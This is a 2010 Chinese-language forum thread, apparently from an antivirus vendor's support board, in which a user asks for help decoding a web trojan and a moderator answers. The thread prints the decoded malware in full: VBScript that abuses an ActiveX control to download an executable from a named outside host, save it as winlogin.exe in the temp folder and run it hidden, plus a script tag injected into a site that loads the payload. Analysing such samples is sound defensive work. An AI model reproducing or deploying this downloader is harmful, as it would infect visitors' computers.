带脚镣跳舞 - 2010-1-6 15:11:00
在freshow中,解密该网马,杀毒软件提示脚本病毒,无法连接成功,有没有其他办法可以解密
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; CIBA; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2010-1-6 15:14:00
解密时建议暂时关闭安全类软件监控,一般情况下不会导致系统中毒,如不放心可在虚拟机下进行解密。
带脚镣跳舞 - 2010-1-6 15:24:00
<SCRIPT>var Words="<html>
<script language="VBScript">
on error resume next
dl = "http://www.zzjsxy.com/al\system.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>system</title>
</head><body>
<center></center>
</body></html>
";document.write(unescape(Words))</SCRIPT>
http://www.nc-ndt.com/index.asp<script language="javascript" src="http://wswmxz.vicp.net/index.htm"></script>
经过解密后是这样的结果
官方给出的结果是http://www.zzjsxy.com/alsystem.exe
但是代码中有个src以及al\system.exe
请斑竹解惑
networkedition - 2010-1-6 15:31:00
http://www.zzjsxy.com/al\system.exe 是这个,把斜杠修改一下
http://www.zzjsxy.com/al/system.exe
© 2000 - 2025 Rising Corp. Ltd.
